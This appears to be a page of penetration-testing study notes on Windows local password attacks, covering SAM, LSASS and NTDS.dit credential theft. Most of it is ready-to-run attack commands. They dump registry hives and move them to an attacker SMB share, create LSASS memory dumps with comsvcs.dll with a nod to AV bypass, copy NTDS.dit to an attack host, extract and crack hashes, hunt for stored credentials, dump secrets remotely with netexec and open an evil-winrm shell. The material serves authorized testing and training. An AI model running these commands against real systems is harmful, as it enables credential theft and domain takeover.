Windows Local Password Attacks

Credential Storage Mechanisms

Security Account Manager (SAM) Database

  • Purpose: Stores local account password hashes on standalone Windows systems

  • Location: Registry hives: hklm\sam, hklm\system, hklm\security

  • Scope: Local user accounts on individual Windows machines

  • Functionality:

    • Stores password hashes for local user accounts

    • Allows offline extraction and cracking of password hashes

    • Primary credential store for non-domain-joined computers

Local Security Authority Subsystem Service (LSASS)

  • Purpose: Central credential management process in Windows

  • Location: lsass.exe in Windows system processes

  • Functionality:

    • Caches credentials locally in memory

    • Creates and manages access tokens

    • Handles authentication processes

    • Stores credentials for:

      • Currently logged-in users

      • Cached domain credentials

      • Service account credentials

  • Security Implications:

    • Primary target for credential dumping attacks

    • Stores credentials in memory in various formats

    • Can retain credentials even after user logout

NT Directory Services (NTDS.dit)

  • Purpose: Primary database for Active Directory domain controllers

  • Location: %SystemRoot%\NTDS\NTDS.dit

  • Scope: Enterprise-wide credential storage in Windows domain environments

  • Functionality:

    • Stores user account information for entire Windows domain

    • Contains:

      • User account credentials

      • Group Policy information

      • Domain controller configuration

      • Replication metadata

    • Centralized authentication mechanism for domain-joined computers

    • Enables domain-wide login and access control

  • Key Characteristics:

    • Encrypted at rest

    • Requires specific extraction techniques

    • Contains more comprehensive user information compared to SAM database

SAM Database Attack Methodology

Registry Hive Extraction

  • Requires Administrative Privileges

  • Extracts critical registry hives containing password hashes

  • Command to Save Hives:

    reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save

Transferring Hives to Attack Host

  1. Set Up SMB Server:

    sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/save

  2. Move Hive Files:

    move sam.save \\<ATTACKER_IP>\CompData
move system.save \\<ATTACKER_IP>\CompData
move security.save \\<ATTACKER_IP>\CompData

Hash Extraction with Impacket

  • Uses Impacket's secretsdump.py to extract password hashes

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

LSASS Memory Dumping Methods

Method 1: Memory Dump Creation with Task Manager (GUI)

  1. Task Manager Method (GUI)

    • Steps:

      1. Open Task Manager.

      2. Go to the Processes tab.

      3. Find and right-click lsass.exe.

      4. Select Create dump file.

    • File Location: C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP

    • Transfer: Use file transfer methods (e.g., discussed in Attacking SAM).

Method 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

  • Retrieve lsass.exe PID with :

    • Command Prompt:

      tasklist /svc | findstr lsass

    • PowerShell:

      Get-Process lsass

  • Use rundll32.exe with comsvcs.dll to create memory dump

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

  • Note:

    • Flagged by most modern AV tools.

    • AV bypass techniques may be required.

Credential Extraction

  • Uses Pypykatz to parse and extract credentials from memory dump

pypykatz lsa minidump /path/to/lsass.dmp

Active Directory (NTDS.dit) Attacks

Dictionary Attack

  • Attempts authentication using a list of potential passwords

netexec smb <DC_IP> -u <username> -p <password_list>

NTDS.dit Capture Methods

  1. Volume Shadow Copy:

    vssadmin create shadow /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>

  2. CrackMapExec Method:

    netexec smb <DC_IP> -u <username> -p <password> --ntds

Cracking Hashes with Hashcat

  1. Prepare Hash File (hashestocrack.txt):

    64f12cddaa88057e06a81b54e73b949b
31d6cfe0d16ae931b73c59d7e0c089c0

  2. Crack Hashes:

    sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Credential Hunting Commands

Lazagne Credential Extraction

  • Comprehensive tool for extracting credentials from various applications

lazagne.exe all
# Verbose mode
lazagne.exe all -vv

Findstr Credential Search

  • Searches files for potential credential-related strings

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Key Terms for Credential Discovery

  • Generic: password, passphrase, keys, username, creds, users, pwd, login, credentials

  • Application-specific: configuration, dbcredential, dbpassword, passkeys, passphrases

Remote Authentication Attacks

CrackMapExec Remote Attacks

  • Dump LSA Secrets:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsa

  • Dump SAM Remotely:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --sam

  • Dump NTDS Remotely:

    netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --ntds

Post-Compromise Enumeration

Local Group Membership

net localgroup

User Privileges

net user <username>

Remote Shell Access

evil-winrm -i <DC_IP> -u <username> -p <password>

Key Considerations

  • Requires administrative or elevated privileges

  • Most techniques are detectable by modern antivirus

  • Potential to trigger security alerts

  • Ethical use limited to authorized penetration testing

Defensive Recommendations

  • Implement strong password policies

  • Use multi-factor authentication

  • Regularly update and patch systems

  • Monitor and log authentication events

PreviousRemote Password AttacksNextLinux Local Password Attacks